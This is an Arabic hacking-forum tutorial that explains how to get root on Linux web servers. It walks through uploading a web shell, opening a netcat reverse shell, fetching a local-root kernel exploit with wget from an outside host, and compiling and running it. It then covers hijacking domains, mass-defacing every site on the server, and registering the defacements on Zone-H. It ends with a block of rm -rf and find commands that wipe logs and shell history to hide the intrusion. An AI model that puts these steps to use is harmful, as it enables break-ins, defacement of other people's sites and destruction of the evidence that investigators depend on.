|~الروت تحت المجهر~|

[align=center]=X-MaN HaCk3r T34M Is HeaR
ViRuS Qalaa
=====================


اهلا وسهلا بكم ياعناكب في موضوع حول الروت من البداية الى نهاية (Root in server) :00001793[1]:
في بداية الامر سوف ينقسم هذا الموضوع الى
1-ماهو الروت
2-كيف يمكن الحصول على الروت
3-اللوكل المناسب وكيف البحث عنة
4-اتصال بلسيرفر بكل الطريق
5-الحصول على الروت
6-ماذا بعد الروت
7-سحب الدومنين
8-عمل ماس ديفس
9-التسجيل فى الزون اتش المواقع المخترقة
10-مسح اثارك من السيرفر
==========================
قبل ان نبدأ الموضوع اريد اعطيكم مقدمة بسيطة بسبب كتابتي هذا الموضوع اخوان لاحضت ان السيرفرات هذا الايام تعطي صلاحية يوزر والاوامر اظهار اليوزرات المواقع ممنوعة خاصتا السيرفرات تحديث 2009 لذلك الشباب يرفع انديكس وبروح ولا يفكر بلروت ابدأ المهم اعتقد ان هناك نظام حماية جديد بلسيرفرات او هو قانون جديد حيث يعطونك صلاحية يوزر على الموقع لي انتة رافع شل ولايعطونك صلاحية نوبدي (اعتقد ان صلاحية نوبدي انقرضت:a23لذلك يخلونك تخترق الموقع ولا يسمحون بختراق المواقع الباقية على السيرفر الان نبدأ بلدرس ~ :41:
________________________________
1-ماهو الروت:
الروت هو اعلى صلاحية في السيرفر لينكس واذا حصل شخص على صلاحية الروت يكون السيرفر كلة في خطر تام كيف يكون السيرفر في خطر انة اقول لك يمكن بعد الحصول على الروت يمكن تسحب الدومنينات المواقع ويمكن تغير جميع انديكسات الموقع بأنديكس اختراق وهذا مايسمى بلــــماس ديفس وراح اشرح في الفقرات التالية وذا حصلت على الروت يكون السيرفر ملكك وهنا فهمنا ماهو الروت واكيد لي يريد يأخذ روت لازم يعرف ماهو الروت اصلا ويكون لدية خبرة في اختراق المواقع :088:



2-كيف يمكن الحصول على الروت(Root in server):
هناك طرق كثيرة في الحصول على الروت وسوف اذكر اهم الطرق وهي...)
1-عن طريق اللوكل روت وهي استغلال ثغرة في بكرنيل السيرفر ,وحسب اصدار الكرنيل
2-عن طريق استغلال ثغرات البرنامج لي على السيرفر
3-عن طريق قرأة الملفات لي يكون فية باسورد الروت << وعتقد ان هناك درس في دورة sql كيف اخذ باسورد الروت

وهم طريقة والطريقة الشائعة الان هي طريقة اللوكل الروت واصدار الكرنيل لان نشرح هذة الطريقة
لكل سيرفر كرنيل واصدار لهذا الكرنيل والهكر الكبار مثلي smilies8 هههههه يجدون ثغرة لهذا الاصدار الكرنيل وينقلون هذة الثغرة في اصدار الكرنيل الى مواقع السيكورتي واحنة نستغل هذة الثغرة ومايسمى بلوكل روت وعن طريق الاستغلال هذة الثغرة في السيرفر نحصل على الروت وان شاء الله اشرح لكم الطرق الباقية بأذن الله :Great:


3-اللوكل المناسب وكيف البحث عنة:
في البداية لنعرف ماهو لوكل الروت :برنامج مبرمج لستغلال ثغرة في اصدار الكرنيل ولوكلات مبرمجة بلغة c وهناك لوكلات مترجمة وذا كان اللوكل مبرمجة بلغة c يحتاج لها ترجمة قبل التشغيل وسوف اشرح لكم في الفقرات التالية بس كيف نفرق بين المترجم والغير مترجم انة اقول لك اذا لوكل منتهي بمتداد c فانة غير مترجم ويحتاج ترجمة واذا لوكل منتهي بغير امتداد او اي امتداد اخر فانة مترجم بس لماذا اللوكل دائما بلغة c لان نوة الكرنيل في نضام لينكس تكون مبرمجة بلغة c شفتوا لازم تتعلموا لينكس لانهو يفيدكم كثيرا :etonnement-29[1]:

الان كيف نعرف لوكل المناسب لنا وكيف نقوم بلبحث عنة قي البداية عندما ترفع الشل على السيرفر نقوم بتنفيذ الامر التالي (uname -a) او يمكن رؤية اصدار الكرنيل في بداية الشل كما في الصورة التالية


اصدار الكرنيل :
الي بلون الاخضر ذا اصدار الكرنيل
ولي بلون الازرق ذا النحديث نواة الكرنيل

او يمكن تنفيذ الامر التالي uname -a ايظا ليظهر لك اصدار لوكل


الان نريد كيف نبحث على هذا اصدار الكرنيل نريد لة لوكل روت كيف
اولا:عن طريق الاخ قوقل كيف تروح لقوقل وتكتب
local root xxx
حيث xxx نضع بدلة اصدار الكرنيل
او
local root exploit xxx
حيث xxx اصدار الكرنيل نضعة بدلة
ولازم تعرف تحديث الكرنيل مثيل 2009 او 2010 لان كل لوكل يختلف في التحديث

ثانيا:عن طريق مواقع السكيورتي
سوف اشرح على اهم موقع لان والاقوى
هذا الموقع
http://www.exploit-db.com
كما في الصورة التالية في البحث




ونكتب في البحث كذا
localroot xxx
حيث xxx نضع بدلة اصدار الكرنيل
وتختار النوع

وان شاء الله راح تحصل على لوكل روت المناسب
وهذا مواقع لبحث على لوكل

4-اتصال بلسيرفر بكل الطريق:
اهم يشيء بعد الحصول على لوكل روت هو الاتصال بلسيرفر يعني اذا ماتصلنة بلسيرفر ماراح نحصل على روت والاتصال بلسيرفر يعني بدل ماتروح لشل تروح لشلشة الدوس وتنفذ الاوامر وهناك طرق كثير لاتصال بلسيرفر وهناك موضوع لاخ فالكوني يشرح هذة الاتصال بثلاثة طرق وهذا رابط الموضوع
شرح الاتصال العكسي باعقد السيرفرات بثلاث طرق والاتصال ينجح باذن الله ‏

وانة راح اشرح لكم طريقة رابعة لي مايستطيع فتح بورت في جهازة مثلي
هناك طرق كثيرة لتسجيل في موقع ريلاكس البخيل smilies13 ماني راح اشرح انتة احصل على حساب والان بعد الحصول على حساب
والان بعد الحصول على الحساب يمكنك ان تتصل وانشاء اتصال VPN

الان سوف اشرح لكم الاتصال بلسيرفر بعد ماعملة اتصال VPN يلا نبدأ على بركة الله
في البداية الأمر نحمل هذة الاداة وهي netcat
اضغط هنا

نفك الضغط عنها ونضعها على مسار الهارد c او اي هارد انتة واضع الوندوز فية
الان كل شيء تمام نحمل هذا الشل وهو شل Egy_Spider العربي الاصدار الثاني القوى والافضل والاروع لحد الان في سنة 2010 الجديد كليا
اضغط هنا
نرفع الشل على موقع المصاب او الموقع لي انتة تريد الحصول علية على روت اوكي

الان نذهب الى الدوس كما في الصورة



start>>Run>>cmd
تم الدخول لــــ Dos
http://up.ma/images/b0h9zwhlnwqwujh8g81u.png
ونضع الامر التالي
cd\

وبعد ذلك ندخل الى حافظة النت كات بلأمر
cd netcat
http://up.ma/images/1d0t62dgbmika2o4nglv.png

تم الدخول

اوكي كل شيء تمام الان نذهب الى هذا الموقع
http://www.ip-adress.com

لمعرفة ip الخاص فينة
الان نذهب الى الشل لي احنة رافعينة على الموقع الى اخر الشل

1-ip لي احنة طلعناة من الموقع لي فوق
2-البورت وراح نستخدم بورت 443 البورت الخاص في اتصال ريلاكس
3-لانغير شيء
4-لاتضغ الان بعد قليل من اقول لك

الان كل شيء تمام نرجع الى النت كات
ونكتب الامر
nc -vlp port
مع تغير port
الى 443 بورت اتصال ريلاكس

الان نضغط انتر (enter)

ونذهب الى الشل ونضغط رقم اربعة وهو (Connect)

الان تم الاتصال بلشل الان انتهينة من هذة الخطوة الحمد لله


5-الحصول على الروت:
بعد ما اتصلنة بلسيرفر ووجدنة اللوكل المناسب الان نريد سحب الروت على السيرفر
اول شيء لحصول على الروت هو سحب لوكل على الموقع ويقصل ان يكون المجلد يحمل تصريح 777
ويسحب اللوكل بامر
wegt www.viers.com/localroot.zip
wegt<<<الامر السحب
www.viers.com/local.zip<<<موقع لوكل او انتة ترفع لوكل على اي موقع مجاني ويفض لوكل بمتداد zip
الان تم السحب
نفط الضغط بامر
unzip local.zip
unzip<<<امر فك الضغط
local.zip<<<اسم لوكل مع الامتداد

الان نعطي لوكل تصريح 777 بامر
chmod 777 local.c
chmod<<<امر تغير تصريح اي ملف
777<<<رقم التصريح
local.c<<<لوكل

بعد ذلك نترجم اللوكل بامر التالي
gcc local.c –o local
بعد سوف تجد لوكل بدون امتداد هكذا
local
بعد ذلك نعطي اللوكل المترجم تصريح 777 بامر التالي
chmod 777 local
بعد ذلك نشغل اللوكل بامر
local ./
وسوف يشتغل لوكل
نقوم بتنفيذ الامر التالي لرؤية الاصلاحية الان
id
الان صلاحيتنة روت
ننفذ لامر التالي
su
لحصول على صلاحية روت كاملة

وهذا شرح لحصول على الروت
اضغط هنا
الحقوق محفوضة لــــ SnakE1095

لكن هناك لوكلات مختلفة يراد لة عمل مختلف لكن اذا تريد تحترف في اخذ روت واي سيرفر يقابلك تأخذ روت وتتجاوز اي معوق امامك علية اذان حمل كل هذة الدرس قي الموضوع التالي
اضغط هنا



6-ماذا بعد الروت:
بعد الروت ماذا تفعل اممممم تعرف كل شيء تستطيع ان تفعلة مثل سحب الدومينات المواقع ورفع الانديكس على الموقع على السيرفر ومايسمى (بلماس ديفس) وتستطيع سحب الباسوردات المواقع وسحب السي بنلات المواقع بختصار كل شيء تسطتيع ان تفعل مسح تعديل على المواقع وغيرة
لكن انة سوف اشرح لكم اهم الاشياء بلـــروت ودائما الهكر تفعلة وهي عمل ماس ديفس وهي تغير جميع انديكسات السيرفرات الى انديكس الاختراق وسحب الدومينات السيرفر ..الخ



7-سحب الدومنين :
راح اعطيكم شرح فيديوا لسحب الدمنين المواقع على السيرفر الحقوق او الطريق محفوظة لمنتديات القراصنة السعودية

اضغط هنا
لتحميل



8-عمل ماس ديفس:
الماس الديفس الفائدة من هو تغير جميع صفحات المواقع لي على السيرفر الى انديكس الاختراق بدل ماتروح لموقع موقع وتغير الانديكس مثلا يوجد انديكس في مجلد وفية مجلد اخر داخل هذا المجلد وفية index.html يقوم بتغيرة منة هنا تأتي الفائدة من هذة السكريب طبعا السكريب بلغة البيرل perl
وهنا شرح فيديوا لعمل ماس ديفس + السكريب لعمل ماس ديفس
اضغط هنا
لتحميل
جميع الحقوق محفوضة لصاحب الشرح



9-التسجيل فى الزون اتش المواقع المخترقة :
بعد ماتقوم بعمل ماس ديفس وتغير جميع الانديكسات الموقع وتريد سجل اختراق المواقع لي على السيرفر في زون اتش والمواقع لي على السيرفر 250 موقع كيف اذا سجل الاختراق تأخذ واحد واحد بس هاي العملية طويلة ومجهدة لذلك اتى سكريب بلغة البيريل يسجل اخترقاتك في الزون اتش بدقيقة وهذا شرح موجود في المنتدى
سكربت للتسجيل بالزون إتش



10-مسح اثارك من السيرفر:
بعد عمل ماس ديفس لازم نقوم بمسح اثارك على السيرفر ويوجد بياناتك في ملف اسمة لوقل هسة تقول لي ماهو ملف لوقل هو ملف يقوم بحفظ اي بي تبعك واثاراك على السيرفر طيب كيف نمسحة انة اقول لك بمجموعة من الأوامر تنفذة على السيرفر وسوف ينمسح ملف لوقل بأذن الله
وهذة الأوامر:قم بتنفيذ بعد الحصول على صلاحية الروت وعمل ماس ديفس *_*

كود PHP:

rm -rf /tmp/logs  
rm -rf $HISTFILE  
rm -rf /root/.ksh_history  
rm -rf /root/.bash_history  
rm -rf /root/.ksh_history  
rm -rf /root/.bash_logout   
rm -rf /usr/local/apache/logs  
rm -rf /usr/local/apache/log  
rm -rf /var/apache/logs  
rm -rf /var/apache/log  
rm -rf /var/run/utmp  
rm -rf /var/logs  
rm -rf /var/log  
rm -rf /var/adm  
rm -rf /etc/wtmp  
rm -rf /etc/utmp  
find / -name *.bash_history -exec rm -rf {} 
\;  
find / -name *.bash_logout -exec rm -rf {} \;  
find / -name "log*" -exec rm -rf {} \;  
find / -name *.log -exec rm -rf {} \; 


تم الشرح بواسطة:
ViRuS Qalaa
جميع الحقوق محفوظة smilies11



[gdwl]
ملاحظة بسيطة حول الموضوع: :a11:
اخوان والله والله تعبت على هذا الموضوع لذلك ارجوا منك التقيم + الردود استطيع ان اخفي الروابط ولاترها الا بعد الرد لكن الاخفاء الروابط يشوة الموضوع لذلك الرجاء التقم والردود وشكرا لكم وتحياتي لكم وان شاء الله ان يكون الموضوع رائع وجميل والفائدة لكم ان شاء الله ولاتنسى الدعاء لي ولوالدية *_* :a07:
وفي الختام prayer
سلام :sossa: [/gdwl][/align]

المصدر: :: vBspiders Professional Network ::

---

|Zhgv,j jpj hgl[ivZ|